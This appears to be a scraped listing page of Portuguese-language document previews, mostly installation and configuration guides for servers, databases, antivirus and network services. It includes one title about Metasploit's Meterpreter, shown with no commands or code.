Programação Orientada a Objetos com PHP & MySQL Sistema Gerenciador de Banco de Dados: Introdução e configuração de bases de dados com Postgre e MySQL Programação Orientada a Objetos com PHP & MySQL Sistema Gerenciador de Banco de Dados: Introdução e configuração de bases de dados com Postgre e MySQL Prof. MSc. Hugo Souza Iniciando nossas aulas sobre

Leia mais

Guia de Instalação e Configuração do Apache, PHP, MySQL e phpmyadmin emwindows

Guia de Instalação e Configuração do Apache, PHP, MySQL e phpmyadmin emwindows Universidade Federal de Santa Catarina -UFSC Centro Acadêmico de Engenharia de Controle e Automação CAECA Setor de Informática Guia de Instalação e Configuração do Apache, PHP, MySQL e phpmyadmin emwindows

Leia mais

GUIA DE IMPLEMENTAÇÃO

GUIA DE IMPLEMENTAÇÃO Kaspersky Administration Kit 8.0 GUIA DE IMPLEMENTAÇÃO V E R S Ã O D O A P L I C A T I V O : 8. 0 C F 1 Caro usuário. Obrigado por escolher nosso produto. Esperamos que esta documentação lhe ajude em seu

Leia mais

Formação IPv6 Maputo Moçambique 26 Agosto - 29 Agosto 08. Configuração de Sistema (Windows XP)

Formação IPv6 Maputo Moçambique 26 Agosto - 29 Agosto 08. Configuração de Sistema (Windows XP) Moçambique 26 Agosto - 29 Agosto 08 Carlos Friaças (cfriacas@fccn.pt) Pedro Lorga (lorga@fccn.pt) Exercício: Configuração de Sistema(Windows XP) Objectivos Neste exercício completará as seguintes tarefas:

Leia mais

TUTORIAL DE INSTALAÇÃO Windows Server 2003 32 Bits. Rua Maestro Cardim, 354 - cj. 121 CEP 01323-001 - São Paulo - SP (11) 3266-2096

TUTORIAL DE INSTALAÇÃO Windows Server 2003 32 Bits. Rua Maestro Cardim, 354 - cj. 121 CEP 01323-001 - São Paulo - SP (11) 3266-2096 TUTORIAL DE INSTALAÇÃO Windows Server 2003 32 Bits Índice Geral Antes de Começar 2 Instalação do MS-IIS 6 4 Instalação do MS-IIS 6 Resources Kit 6 Instalação do PHP 7 Instalação do ZEND Optimizer 8 Instalação

Leia mais

Introdução ao Sistema. Características

Introdução ao Sistema. Características Introdução ao Sistema O sistema Provinha Brasil foi desenvolvido com o intuito de cadastrar as resposta da avaliação que é sugerida pelo MEC e que possui o mesmo nome do sistema. Após a digitação, os dados

Leia mais

Instalação do Sistema. Treinamento OTRS Help Desk

Instalação do Sistema. Treinamento OTRS Help Desk Instalação do Sistema Treinamento OTRS Help Desk Sumário Instalação... 3 Recomendações...3 Requisitos de Instalação...5 Preparando a Instalação no CentOS 6.5 (64 bits)...5 Preparando a Instalação no Ubuntu

Leia mais

Configure seu Linux pela Web! Instalação à partir de um.tar.gz. Autor: Carlos Eduardo Ribeiro de Melo Data: 05/10/2004

Configure seu Linux pela Web! Instalação à partir de um.tar.gz. Autor: Carlos Eduardo Ribeiro de Melo <eduardo at unisulma.edu.br> Data: 05/10/2004 1 de 6 27/3/2007 10:03 Configure seu Linux pela Web! Autor: Carlos Eduardo Ribeiro de Melo Data: 05/10/2004 Introdução O Webmin é um software de configuração de servidores

Leia mais

OMT-G Design. Instalação por pacotes

OMT-G Design. Instalação por pacotes OMT-G Design A plataforma Eclipse OMT-G Design não é um software independente, é um plug-in que se utiliza dos mecanismos de extensão do Eclipse que por sua vez é um ambiente de desenvolvimento de software.

Leia mais

Aranda INVENTORY. Benefícios Estratégicos para sua Organização. (Standard & Plus Edition) Beneficios. Características V.2.0907

Aranda INVENTORY. Benefícios Estratégicos para sua Organização. (Standard & Plus Edition) Beneficios. Características V.2.0907 Uma ferramenta de inventario que automatiza o cadastro de ativos informáticos em detalhe e reporta qualquer troca de hardware ou software mediante a geração de alarmes. Beneficios Informação atualizada

Leia mais

Compartilhamento de arquivos e diretórios

Compartilhamento de arquivos e diretórios Compartilhamento de arquivos e diretórios O compartilhamento de arquivos e diretórios foi uma das aplicações que motivou o desenvolvimento inicial da rede de computadores. 19 E xistem dois protocolos de

Leia mais

ProRAE Guardian V1.5 Guia de referência rápida

ProRAE Guardian V1.5 Guia de referência rápida ProRAE Guardian V1.5 Guia de referência rápida Para obter uma descrição completa das funções do programa, consulte o guia do usuário do ProRAE Guardian (incluso no CD de software). SUMÁRIO 1. Principais

Leia mais

TUTORIAL DE INSTALAÇÃO Windows Server 2008 64 Bits. Rua Maestro Cardim, 354 - cj. 121 CEP 01323-001 - São Paulo - SP (11) 3266-2096

TUTORIAL DE INSTALAÇÃO Windows Server 2008 64 Bits. Rua Maestro Cardim, 354 - cj. 121 CEP 01323-001 - São Paulo - SP (11) 3266-2096 TUTORIAL DE INSTALAÇÃO Windows Server 2008 64 Bits Índice Geral Antes de Começar 2 Instalação do MS-IIS 7 4 Instalação do PHP 6 Instalação do ZEND Optimizer 7 Instalação do.net Framework 8 Instalação das

Leia mais

Configuração de Digitalizar para E-mail

Configuração de Digitalizar para E-mail Guia de Configuração de Funções de Digitalização de Rede Rápida XE3024PT0-2 Este guia inclui instruções para: Configuração de Digitalizar para E-mail na página 1 Configuração de Digitalizar para caixa

Leia mais

Líder em Soluções Samba 4 no Brasil

Líder em Soluções Samba 4 no Brasil Apresentação Líder em Soluções Samba 4 no Brasil A Vantage TI conta uma estrutura completa para atender empresas de todos os segmentos e portes, nacionais e internacionais. Nossos profissionais dedicam-se

Leia mais

Guia de instalação do Sugar CRM versão open source no Microsoft Windows XP

Guia de instalação do Sugar CRM versão open source no Microsoft Windows XP Guia de instalação do Sugar CRM versão open source no Microsoft Windows XP Noilson Caio Teixeira de Araújo Sugar CRM é um software de código fonte aberto (open source) que permite uma organização para

Leia mais

CET GRSI@estgf.ipp.pt

CET GRSI@estgf.ipp.pt CET GRSI@estgf.ipp.pt 1 Julho 2011 António Paulo Santos aps@estgf.ipp.pt grsi.estgf.ipp.pt 29-07-2011 Conceito de Servidor WWW Disponibilizador de informação numa rede Permite acesso simplificado através

Leia mais

Avaliação de Ferramentas de Análise de Segurança: Nessus OpenVAS

Avaliação de Ferramentas de Análise de Segurança: Nessus OpenVAS Avaliação de Ferramentas de Análise de Segurança: Nessus OpenVAS Tiago da S. Pasa 1 1 Faculdade de Tecnologia Senac Pelotas(FATEC) Rua Gonçalves Chaves, 602 Centro CEP: 96.015-560 Pelotas RS Brasil Curso

Leia mais

Manual de Instalação INSTALAÇÃO E CONFIGURAÇÃO DE PROGRAMAS

Manual de Instalação INSTALAÇÃO E CONFIGURAÇÃO DE PROGRAMAS Manual de Instalação INSTALAÇÃO E CONFIGURAÇÃO DE PROGRAMAS Lista de Programas - Java versão 6.0 ou superior JDK (Java Development Kit) /Setups/java/jdk-6u3-windows-i586-p O JDK já vem com o JRE (Java

Leia mais

Instalando o Root Management Server (RMS)

Instalando o Root Management Server (RMS) Instalando o Root Management Server (RMS) Última revisão feita em 07 de Abril de 2008. Objetivo Depois de instalarmos a base de dados do SCOM 2007 é hora de implementar o Root Management Server (RMS) e

Leia mais

Kaspersky Security Center 10 SP1 (KSC 10 SP1) Como criar Exclusões

Kaspersky Security Center 10 SP1 (KSC 10 SP1) Como criar Exclusões Kaspersky Security Center 10 SP1 (KSC 10 SP1) Como criar Exclusões Regras de exclusão são grupos de condições que o Kaspersky Endpoint Security utiliza para omitir um objeto durante uma varredura (scan)

Leia mais

Manual de Instalação e Configuração do SQL Express

Manual de Instalação e Configuração do SQL Express Manual de Instalação e Configuração do SQL Express Data alteração: 19/07/11 Pré Requisitos: Acesse o seguinte endereço e faça o download gratuito do SQL SRVER EXPRESS, conforme a sua plataforma x32 ou

Leia mais

Manual de Instalação SAP R/3. 4.70 Enterprise

Manual de Instalação SAP R/3. 4.70 Enterprise Manual de Instalação SAP R/3 4.70 Enterprise Elaborado Por : Amantino Freitas Soares Coordenador de TI Basis/SQL Server Abap 4 cronossp@terra.com.br Elaborado por : Amantino Freitas Soares 1 Começar instalando

Leia mais

FileZilla Server. O FileZilla Server é um ótimo servidor FTP, conta com diversas funções e fácil instalação e configuração.

FileZilla Server. O FileZilla Server é um ótimo servidor FTP, conta com diversas funções e fácil instalação e configuração. FileZilla Server Já apresentei um tutorial sobre o FileZilla, um cliente FTP com versões para vários sistemas operacionais, agora vou falar sobre o FileZilla Server, um programa que transforma seu computador

Leia mais

Amadeus Pro Printer 5.1P275

Amadeus Pro Printer 5.1P275 Amadeus Pro Printer 5.1P275 Guia de Instalação do Usuário Final Index _ Sobre este guia... 3 _ Requerimentos de Software... 3 Sistemas Operacionais... 3 _ Processo de Instalação... 4 Configurações do Internet

Leia mais

Treinamento GVcollege Módulo Financeiro 1

Treinamento GVcollege Módulo Financeiro 1 Treinamento GVcollege Módulo Financeiro 1 AVISO O conteúdo deste documento é de propriedade intelectual exclusiva da GVDASA Sistemas e está sujeito a alterações sem aviso prévio. Nenhuma parte desta publicação

Leia mais

Faculdade de Tecnologia SENAC Goiás. Disciplina: Gerenciamento de Rede de Computadores. Goiânia, 16 de novembro de 2014.

Faculdade de Tecnologia SENAC Goiás. Disciplina: Gerenciamento de Rede de Computadores. Goiânia, 16 de novembro de 2014. Faculdade de Tecnologia SENAC Goiás Disciplina: Gerenciamento de Rede de Computadores : Goiânia, 16 de novembro de 2014. Faculdade de Tecnologia SENAC Goiás Professor: Marissol Martins Alunos: Edy Laus,

Leia mais

Sophos SafeGuard Enterprise 6.00.1

Sophos SafeGuard Enterprise 6.00.1 Sophos SafeGuard Enterprise 6.00.1 Guia: Manual de instalação do Sophos SafeGuard Enterprise 6.00.1 Data do Documento: novembro de 2012 1 Conteúdo 1. Sobre este manual... 3 2. Requisitos de Sistema...

Leia mais

DHCP. Definindo DHCP: Fundamentação teórica do DHCP. Esquema visual

DHCP. Definindo DHCP: Fundamentação teórica do DHCP. Esquema visual Definindo DHCP: DHCP O DHCP é a abreviatura de Dynamic Host Configuration Protocol é um serviço utilizado para automatizar as configurações do protocolo TCP/IP nos dispositivos de rede (computadores, impressoras,

Leia mais

Explorando recursos de ataque do Meterpreter

Explorando recursos de ataque do Meterpreter Explorando recursos de ataque do Meterpreter Cnx CH 18 de março de 201618 de março de 2016 2 Comentários Adentrando ao mundo do Metasploit, o payload Meterpreter (Meta-intérprete) está disponível para

Leia mais

Guia de conceitos básicos API Version 2010-01-01

Guia de conceitos básicos API Version 2010-01-01 : Guia de conceitos básicos Copyright 2011 Amazon Web Services LLC ou suas afiliadas. Todos os direitos reservados. Conceitos básicos do Amazon RDS... 1 Cadastre-se no Amazon RDS... 2 Inicie uma instância

Leia mais

Kaspersky Administration Kit 8.0 GUIA DE IMPLEMENTAÇÃO

Kaspersky Administration Kit 8.0 GUIA DE IMPLEMENTAÇÃO Kaspersky Administration Kit 8.0 GUIA DE IMPLEMENTAÇÃO V E R S Ã O D O A P L I C A T I V O : 8. 0 Caro usuário. Obrigado por escolher nosso produto. Esperamos que esta documentação lhe ajude em seu trabalho

Leia mais

Requisitos de Hardware e Software

Requisitos de Hardware e Software Requisitos de e Objetivo O objetivo deste documento é validar os requisitos de hardware e de software do cliente com as necessidades do GVcollege. O mesmo é divido em três etapas: Módulos Cliente/, Módulos

Leia mais

Funcionalidades da ferramenta zabbix

Funcionalidades da ferramenta zabbix Funcionalidades da ferramenta zabbix Jordan S. Romano¹, Eduardo M. Monks¹ ¹Curso Superior de Tecnologia em Redes de Computadores FACULDADE DE TECNOLOGIA SENAC PELOTAS (FATEC PELOTAS) Rua Gonçalves Chaves,

Leia mais

Manual de Instalação: Agente do OCS Inventory NG

Manual de Instalação: Agente do OCS Inventory NG Manual de Instalação: Agente do OCS Inventory NG Abril 2013 Sumário 1. Agente... 1 2. Onde instalar... 1 3. Etapas da Instalação do Agente... 1 a. Etapa de Instalação do Agente... 1 b. Etapa de Inserção

Leia mais

GUIA DE INÍCIO RÁPIDO NHS NOBREAK MANAGER 4.0 TOPOLOGIA MÍNIMA DE REDE PARA A INSTALAÇÃO E USO DO SOFTWARE COM GPRS

GUIA DE INÍCIO RÁPIDO NHS NOBREAK MANAGER 4.0 TOPOLOGIA MÍNIMA DE REDE PARA A INSTALAÇÃO E USO DO SOFTWARE COM GPRS GUIA DE INÍCIO RÁPIDO NHS NOBREAK MANAGER 4.0 TOPOLOGIA MÍNIMA DE REDE PARA A INSTALAÇÃO E USO DO SOFTWARE COM GPRS CONFIGURAÇÃO DO GPRS 1. Entre no site da NHS na página de homologação do NHS NOBREAK

Leia mais

MANUAL DE INSTALAÇÃO. LSoft Ponto Eletrônico

MANUAL DE INSTALAÇÃO. LSoft Ponto Eletrônico MANUAL DE INSTALAÇÃO LSoft Ponto Eletrônico SUPORTE TÉCNICO AO USUÁRIO: Atendimento On-line: www.lsoft.com.br E-Mail: suporte@lsoft.com.br (37) 3237-8900 Versão 1.0-2014. Todos os direitos reservados.

Leia mais

FileMaker 13. Guia de ODBC e JDBC

FileMaker 13. Guia de ODBC e JDBC FileMaker 13 Guia de ODBC e JDBC 2004 2013 FileMaker Inc. Todos os direitos reservados. FileMaker Inc. 5201 Patrick Henry Drive Santa Clara, Califórnia 95054 FileMaker e Bento são marcas comerciais da

Leia mais

MA001. 01 de 28. Responsável. Revisão Q de 26/06/2015. Cantú & Stange Software. Página

MA001. 01 de 28. Responsável. Revisão Q de 26/06/2015. Cantú & Stange Software. Página Manual de instalação do Zada 5 MA001 Responsável Revisão Q de 26/06/2015 FL Página 01 de 28 Página 1 de 33 Revisão Q de 26/06/2015 MA001 Responsável: FL Manual de instalação do Zada 5 Este manual consiste

Leia mais

Microsoft.NET. Desenvolvimento Baseado em Componentes

Microsoft.NET. Desenvolvimento Baseado em Componentes Microsoft.NET Lirisnei Gomes de Sousa lirisnei@hotmail.com Jair C Leite jair@dimap.ufrn.br Desenvolvimento Baseado em Componentes Resolução de problemas específicos, mas que podem ser re-utilizados em

Leia mais

MANUAL PARA USO DO SISTEMA GCO Gerenciador Clínico Odontológico

MANUAL PARA USO DO SISTEMA GCO Gerenciador Clínico Odontológico MANUAL PARA USO DO SISTEMA GCO Gerenciador Clínico Odontológico O GCO é um sistema de controle de clínicas odontológicas, onde dentistas terão acesso a agendas, fichas de pacientes, controle de estoque,

Leia mais

Receita de bolo para instalar MinGW-GCC e Netbeans em Windows

Receita de bolo para instalar MinGW-GCC e Netbeans em Windows Receita de bolo para instalar MinGW-GCC e Netbeans em Windows Hae Yong Kim 13/08/2014 Este documento explica como fiz para instalar compilador MinGW-GCC e ambiente de desenvolvimento Netbeans em Windows.

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores LAMP Gustavo Reis gustavo.reis@ifsudestemg.edu.br Acrônico para a combinação de Linux, Apache, MySQL e PHP ou Perl ou Python; Recentemente a letra P começou a fazer referência a Perl

Leia mais

Conteúdo Programático de PHP

Conteúdo Programático de PHP Conteúdo Programático de PHP 1 Por que PHP? No mercado atual existem diversas tecnologias especializadas na integração de banco de dados com a WEB, sendo o PHP a linguagem que mais se desenvolve, tendo

Leia mais

Kaspersky Endpoint Security e o gerenciamento. Migração e novidades

Kaspersky Endpoint Security e o gerenciamento. Migração e novidades Kaspersky Endpoint Security e o gerenciamento. Migração e novidades Treinamento técnico KL 202.10 Treinamento técnico KL 202.10 Kaspersky Endpoint Security e o gerenciamento. Migração e novidades Migração

Leia mais

BioOne Série para Bibliotecários com Dicas. Utilizando o módulo administrativo

BioOne Série para Bibliotecários com Dicas. Utilizando o módulo administrativo BioOne Série para Bibliotecários com Dicas Utilizando o módulo administrativo Como acessar meu perfil de usuário My BioOne 1- Na página principal (www.bioone.org), por favor clique no link Log In no lado

Leia mais

COMO INSTALAR ZIM 8.50 WINDOWS

COMO INSTALAR ZIM 8.50 WINDOWS ZIM TECHNOLOGIES DO BRASIL COMO INSTALAR ZIM 8.50 WINDOWS Próx Antes de Iniciar O objetivo deste documento é apresentar os passos necessários para instalar a versão mais recente do Zim 8.50 para Windows.

Leia mais

Passo a Passo da instalação da VPN

Passo a Passo da instalação da VPN Passo a Passo da instalação da VPN Dividiremos este passo a passo em 4 partes: Requisitos básicos e Instalação Configuração do Servidor e obtendo Certificados Configuração do cliente Testes para saber

Leia mais

Capítulo 8 - Aplicações em Redes

Capítulo 8 - Aplicações em Redes Capítulo 8 - Aplicações em Redes Prof. Othon Marcelo Nunes Batista Mestre em Informática 1 de 31 Roteiro Sistemas Operacionais em Rede Modelo Cliente-Servidor Modelo P2P (Peer-To-Peer) Aplicações e Protocolos

Leia mais

Manual de Instalação Corporate

Manual de Instalação Corporate Manual de Instalação Corporate Sumário 1. Sobre este documento...3 2. Suporte técnico...3 3. Requisitos de hardware...3 3.1. Estação...3 3.2. Servidor...4 4. Instalação...4 4.1. Instalação do Imobiliária21

Leia mais

Redes de Dados e Comunicações. Prof.: Fernando Ascani

Redes de Dados e Comunicações. Prof.: Fernando Ascani Redes de Dados e Comunicações Prof.: Fernando Ascani Camada de Aplicação A camada de Aplicação é a que fornece os serviços Reais para os usuários: E-mail, Acesso a Internet, troca de arquivos, etc. Portas

Leia mais

ZIM 8.50 PRIMEIROS PASSOS (WINDOWS E UNIX)

ZIM 8.50 PRIMEIROS PASSOS (WINDOWS E UNIX) ZIM TECHNOLOGIES DO BRASIL ZIM 8.50 PRIMEIROS PASSOS (WINDOWS E UNIX) Próx Antes de Iniciar O objetivo deste documento é apresentar os primeiros passos para utilizar a versão mais recente do Zim 8.50 para

Leia mais